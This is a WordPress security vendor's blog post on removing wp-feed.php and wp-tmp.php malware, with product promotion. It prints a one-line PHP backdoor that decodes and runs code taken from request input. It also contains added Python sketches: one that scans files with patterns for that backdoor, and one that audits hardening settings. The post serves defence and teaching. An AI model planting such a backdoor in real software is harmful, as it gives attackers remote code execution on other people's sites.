How to Fix wp-feed.php & wp-tmp.php Malware in WordPress?
Is your malware scanner alerting you that “your site is hacked” but it looks fine to you?
Are visitors complaining about spam ads on your WordPress website but you don’t see any?
There is a good chance that your site is hacked.
Hackers find clever ways to disguise their hacks from site owners so that they go undetected and they can continue exploiting the website for a long time.
The wp-feed.php is one of the most cleverly disguised hacks out there.
Hidden from the site owners, it displays ads for illegal products, drugs, and adult content to your visitors.
Even if you were able to detect it, finding all places where the infection has spread to is not only difficult but sometimes impossible. The removal of the infection is complicated and hard. If you do manage to remove it, in 8 out of 10 cases, the infection reappears.
Bottom line: it’s hard to remove a wp-feed.php infection from a WordPress website.
Luckily, we have dealt with this malware countless times before. Over the past decade, we have not only successfully removed wp-feed from hundreds and thousands of WordPress websites, but also prevented reinfections.
Don’t worry. You’re in good hands.
In this article, you’ll learn:
- How wp-feed.php malware operates and how it impacts your website
- How to remove it from your site
- How to prevent reinfections in the future
To remove the wp-feed.php infection, all you need to do is install our WordPress Malware Removal Plugin and run the Auto-Clean function. The plugin also helps prevent reinfection by:
- Removing website backdoors which enable reinfection
- Blocking malicious traffic from accessing your site with a firewall and login protection.
What is wp-feed.php & wp-tmp.php? (Causes, Symptoms, & Reinfections)
In a nutshell: WP-Feed is a type of malware that displays malicious ads on websites. The goal is to get your visitors to click on the ads and redirect them to a malicious website.
You must be wondering –
> How did my website get infected?
The infection is generally caused by the use of nulled plugins or themes.
Nulled software is tempting to use because it offers you premium features free of cost. Many believe that nulled software is distributed as an act of benevolence.
That’s usually far from the case. Nulled software is distributed so that hackers can gain access to your site effortlessly.
Nulled plugins or themes are teeming with malware. When you install a nulled theme or plugin on your website, you are basically opening doors for hackers to access your site.
Besides nulled software, outdated plugins and themes can also be vulnerable. Hackers exploit these vulnerabilities to break into your site.
They also exploit weak usernames and passwords like “admin” and “p@ssword.” Weak credentials are easy to guess.
A hacker can guess your username and login, and implant the wp-feed.php malware into your website directly.
> Why do hackers infect sites with wp-feed.php?
The goal is to steal your visitors and dupe them into buying fake services or products so that hackers can generate revenue.
What is truly amazing is how they are often able to achieve this without the site owner getting a single hint.
Which brings us to the question –
> Why is it hard to notice the symptoms of this infection?
Once hackers gain access to your website, they implant two files (wp-feed.php & wp-tmp.php) into your wp-includes folder.
The wp-includes folder is part of your WordPress core. It’s where the theme of your website is located.
The wp-feed.php file starts infecting other WordPress files, especially functions.php, which is part of your active theme.
From within functions.php, hackers are able to display malicious popup ads on your WordPress website.
The really diabolical part though is that the ads are only shown to new visitors, not repeat visitors. The malware records visitors to your site to ensure that only new visitors are shown the ads. This is an ingenious way to prevent detection.
Hence you, as a frequent visitor to your own site, never notice any symptom of a hack.
How to Clean wp-feed.php Malware?
There are two ways of removing the infection. Those are –
1. Using a plugin (easy)
2. Doing it manually (difficult)
Let’s dive into each method.
1. Removing WP-Feed.php Malware With a Plugin (easy way)
Some of you may already have a security plugin installed on your website. It was probably this plugin that alerted you about the malicious files – wp-includes/wp-feed.php and wp-includes/wp-tmp.php.
Most security plugins offer malware removal services, but very few can do it quickly and as effectively as MalCare Security.
- MalCare will clean your site in under 60 seconds. You don’t have to raise a ticket. You don’t have to wait in a queue. You don’t have to hand over your site’s credentials to a 3rd party plugin.
- Not just that, the plugin goes above and beyond into every nook and cranny, looking for hidden malware. It finds every single malicious script present on your site.
- It uses non-traditional methods to detect new and well-hidden malware. It thoroughly analyzes the behavior of code to identify malicious intent. This also helps to ensure that it’s not marking good code as bad.
- It does all of that within the span of a few minutes.
Let’s clean wp-feed.php infection with MalCare.
Step 1: Install and activate MalCare Security on your WordPress website.
Step 2: From your dashboard menu, select MalCare. Enter your email address and click on Secure Site Now.
Step 3: On the next page, you’ll be asked to enter a password, and then to enter your URL.
MalCare will start scanning your website immediately. The purpose is to find every single instance of malicious code present on your website.
This means it will not just detect the wp-feed.php and wp-tmp.php files, but all the malicious code infecting your WordPress files, including the instances hiding in the functions.php file.
You can rest assured that the plugin will also find every single backdoor present on your site, so as to prevent reinfections.
Upon finding the malicious scripts, the plugin will alert you about it.
Next, you need to clean your site.
Please note that MalCare’s malware removal is a premium feature. It’s the only instant malware removal plugin out there. For $99 a year, you can clean a single site as many times as you want, and be sure of the best protection you can possibly have. Learn more about MalCare Pricing.
Step 4: To remove every single trace of wp-feed.php from your website, all you need to do is click on the Auto-Clean button.
MalCare will start cleaning your site instantly.
That’s it, folks. That’s how you clean your website with a plugin.
2. Manually Remove WP-Feed.php Malware (difficult way)
Manually removing the infection is fairly challenging, because, in this type of infection, there are a lot of moving pieces.
- The hacker uploads two malicious files – wp-feed.php & wp-tmp.php. You need to remove them to start. This is probably the only easy bit.
- The infection spreads to other WordPress files, including the functions.php file. This is hard, because who is to say where the infection has spread.
- It’ll take you hours to find all the malicious code.
- Recognizing the malicious code is difficult because it is well-disguised and looks like normal code.
- Some code patterns known from malware, like “eval(base64_decode)”, can also be part of legitimate plugins, where they are not used in a malicious way. Hence, deleting the code will affect your plugin and may even break your site.
- There is a fairly good chance that you will miss pieces of code that may lead to reinfections.
Manual removal, therefore, is not at all effective.
However, if you still want to do it, please take a complete backup of your website. If you end up deleting something accidentally and breaking your site, you can quickly restore it to normal.
Here’s a list of the best backup services you can opt for.
And here’s an article that’ll help you remove the malware manually – WordPress hacked. Just jump to the “How to Clean a Hacked WordPress Website Manually” section.
Your website is free of infection now, but it’s far from secure. Hackers can still target your site and attempt to infect it. You need to ensure that your site is protected from future infection. But before we get into that, let’s have a look at the impact of wp-feed.php & wp-tmp.php infection.
Impact of wp-tmp.php Malware Infection
Needless to say, the presence of wp-feed.php & wp-tmp.php malware can have a devastating impact on your website.
Websites that have been infected with wp-tmp.php will often suffer the following consequences:
- You will notice a jump in the bounce rate and a decline in the time visitors spend on your website.
- Popup ads will make your website heavy and really slow.
- No one likes a slow website, so visitors are likely to hit the back button before your pages load on the browser. This will have a domino effect.
- Search engines will notice how quickly people are leaving your site. They will conclude that you are not offering what users are searching for. Your search engine ranking will fall.
- This means all the effort, time, and money you might have spent to rank higher in the SERPs is wasted.
- Hacked websites are blacklisted by Google and suspended by hosting providers. Also, if the hacked site is running Google Ads, the AdWords account will be suspended. All this will lead to a further dip in traffic.
- Moreover, hacked websites have to be cleaned which can be an expensive affair, if you are not using the right tools.
The good news is that you know that your site is hacked. Therefore you can clean it and stop the impact.
How to Protect Your Site From wp-feed.php Malware in the Future?
Many of our readers may have tried removing the wp-feed.php malware from their sites, only to discover that the malware keeps returning.
This happens because there is a backdoor installed on your site. Most backdoors are extremely well disguised, so much so that they can be passed over as legitimate code by amateur developers.
In a previous section, we explained that hackers insert two files, wp-feed.php & wp-tmp.php, into your website code. The wp-tmp.php file acts as a backdoor. If you open the file, you will find a script that looks something like this –
$p = $_REQUEST["m"]; eval(base64_decode($p));
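A triage sketch for the backdoor pattern above and for the false-positive problem noted under manual removal. It is an added example, not MalCare's code or part of the original article; the sample files, the `review` verdict and the function names are constructed for illustration. It separates `eval(base64_decode(...))` fed by request input from the same construct with an unknown source.

```python
import re
import tempfile
from pathlib import Path

DROPPED = {"wp-feed.php", "wp-tmp.php"}  # names the article says land in wp-includes
SOURCE = r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]*\]"  # request-controlled input
ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + SOURCE)  # e.g. $p = $_REQUEST["m"]
SINK = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*([^)]*?)\s*\)", re.I)

def classify(php: str) -> str:
    """Return 'backdoor', 'review' or 'clean' for one PHP source string."""
    tainted = {m.group(1) for m in ASSIGN.finditer(php)}
    verdict = "clean"
    for m in SINK.finditer(php):
        var = re.fullmatch(r"\$(\w+)", m.group(1))
        if re.match(SOURCE, m.group(1)) or (var and var.group(1) in tainted):
            return "backdoor"  # request input is decoded and executed
        verdict = "review"  # same construct, source unknown: a human decides
    return verdict

def scan(root: Path) -> dict:
    """Map relative path -> finding for each PHP file worth a look."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        verdict = classify(path.read_text(errors="replace"))
        dropped = path.parent == root / "wp-includes" and path.name in DROPPED
        if verdict == "clean" and dropped:
            verdict = "dropped-file"  # flagged by name and location alone
        if verdict != "clean":
            findings[path.relative_to(root).as_posix()] = verdict
    return findings

def demo() -> dict:
    """Scan a constructed tree (sample files are made up for this example)."""
    samples = {
        "wp-includes/wp-tmp.php": '<?php $p = $_REQUEST["m"]; eval(base64_decode($p));',
        "wp-includes/wp-feed.php": "<?php // constructed placeholder body",
        "wp-includes/feed.php": "<?php $raw = base64_decode($stored);",
        "wp-content/plugins/demo/loader.php": "<?php eval(base64_decode($packed));",
    }
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in samples.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan(root)

if __name__ == "__main__":
    print(demo())
```

A `review` verdict is a prompt to inspect the file, not to delete it, and obfuscated variants will not match these patterns.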
The good news is that you can protect your site from future hack attempts by taking the following measures –
1. Delete Nulled Software & Stop Using Them
If you are using a nulled plugin or theme on your website, delete it immediately.
Hackers gained access to your site using nulled software in the first place. No matter how well you clean your site, if you don’t remove nulled software, hackers will find their way into your site and implant malware.
If you have given your users permission to install plugins and themes, ensure that they never use nulled software.
In fact, it is better practice to prevent the installation of plugins and themes altogether with the help of MalCare.
All you need to do is log into MalCare’s dashboard, select your website, click on Apply Hardening, and enable Block Plugin/Theme Installation.
2. Harden Your Site Security
You can prevent hackers from implanting malicious files like wp-feed.php into your WordPress folders by changing file permissions.
File permissions are a set of rules that determine who can access which files. You can block users from making modifications to the wp-includes folder. To understand file permissions in greater depth, check out this guide: WordPress File Permissions.
You can also block hackers from modifying your theme by disabling the file editor. This will prevent them from injecting pop-up ads on your website. You can do it manually but it’s risky and not recommended.
If you have MalCare already installed on your site, all you need to do is click a button to disable the file editor.
Learn more about WordPress hardening.
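A read-only audit of the two hardening measures in this section, added here as an example (not MalCare's code or the article's own). It assumes the commonly recommended 755/644 permission baseline and WordPress's `DISALLOW_FILE_EDIT` constant in wp-config.php; the demo install is constructed.

```python
import re
import stat
import tempfile
from pathlib import Path

# define('DISALLOW_FILE_EDIT', true); is the WordPress constant that turns off
# the dashboard theme/plugin file editor. Commented-out lines do not count.
EDITOR_OFF = re.compile(
    r"""^\s*define\s*\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)\s*;""",
    re.I | re.M)

def editor_disabled(wp_config: str) -> bool:
    """True if the wp-config.php text disables the dashboard file editor."""
    return bool(EDITOR_OFF.search(wp_config))

def loose_paths(wp_includes: Path) -> list:
    """Paths in wp-includes writable by group or other (looser than 755/644)."""
    loose = []
    for path in sorted([wp_includes, *wp_includes.rglob("*")]):
        if path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            loose.append(path.relative_to(wp_includes.parent).as_posix())
    return loose

def audit(root: Path) -> dict:
    """Report both hardening checks for the WordPress install at root."""
    config = root / "wp-config.php"
    return {
        "file_editor_disabled": config.is_file()
        and editor_disabled(config.read_text(errors="replace")),
        "loose_wp_includes": loose_paths(root / "wp-includes"),
    }

def demo() -> dict:
    """Audit a constructed install: editor left on, one over-permissive file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        inc = root / "wp-includes"
        inc.mkdir()
        inc.chmod(0o755)
        (root / "wp-config.php").write_text(
            "<?php\n// define('DISALLOW_FILE_EDIT', true);\n")
        for name, mode in (("feed.php", 0o644), ("post.php", 0o666)):
            (inc / name).write_text("<?php\n")
            (inc / name).chmod(mode)
        return audit(root)

if __name__ == "__main__":
    print(demo())
```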
3. Keep Your Website Updated
Just like any other software, WordPress plugins and themes develop vulnerabilities. When developers learn about a vulnerability, they quickly create a patch and release it in the form of an update.
If there is any delay in implementing updates, it puts your site at risk.
Hackers are good at exploiting vulnerabilities. In fact, they are always on the lookout for websites with vulnerabilities that they can use to gain access to the site and infect it with malware.
Hence, never delay updates.
You can learn more about security updates from here – WordPress Security Updates.
Here’s a guide that’ll help you keep your site updated – How to Update WordPress.
4. Enforce The Use of Strong Credentials
The easiest way to gain access to your website is via your login page.
The hacker just needs to successfully guess your user credentials. In fact, they design bots that can try out hundreds of username and password combinations within the span of a few minutes. If you or any of your teammates are using easy-to-guess credentials like “admin” and “password123,” it’ll take the bots 2 seconds to breach your site. This is called a brute force attack.
It’s important to ensure that every user of your website uses unique usernames and strong passwords.
You can even go beyond this and implement several measures to protect your login page. We have compiled a list of WordPress login security measures that you can take.
5. Use a Firewall
Wouldn’t it be great if you could prevent hackers from even landing on your website in the first place?
A firewall is just the tool you need.
It investigates the traffic that wants to gain access to your site. If it detects that the traffic originates from a malicious IP address, the firewall promptly blocks the traffic.
In this way, it filters out hackers and bots.
Here’s a list of the best WordPress firewalls you can activate on your site.
However, if you are using MalCare, then you already have a firewall activated on your site.
We have shown you how to clean your site and how to ensure that you are never hacked again.
A piece of advice that we think will save your website from a number of disasters is – take regular backups of your website.
Whether your website is suddenly throwing an error or it’s broken, a backup will help you quickly fix your site temporarily.
If you subscribe to MalCare Security, you can also avail of a backup addon for an extra charge. Get in touch with us to learn more.
Sufia is a WordPress enthusiast, and enjoys sharing their experience with fellow enthusiasts. On the MalCare blog, Sufia distils the wisdom gained from building plugins to solve security issues that admins face.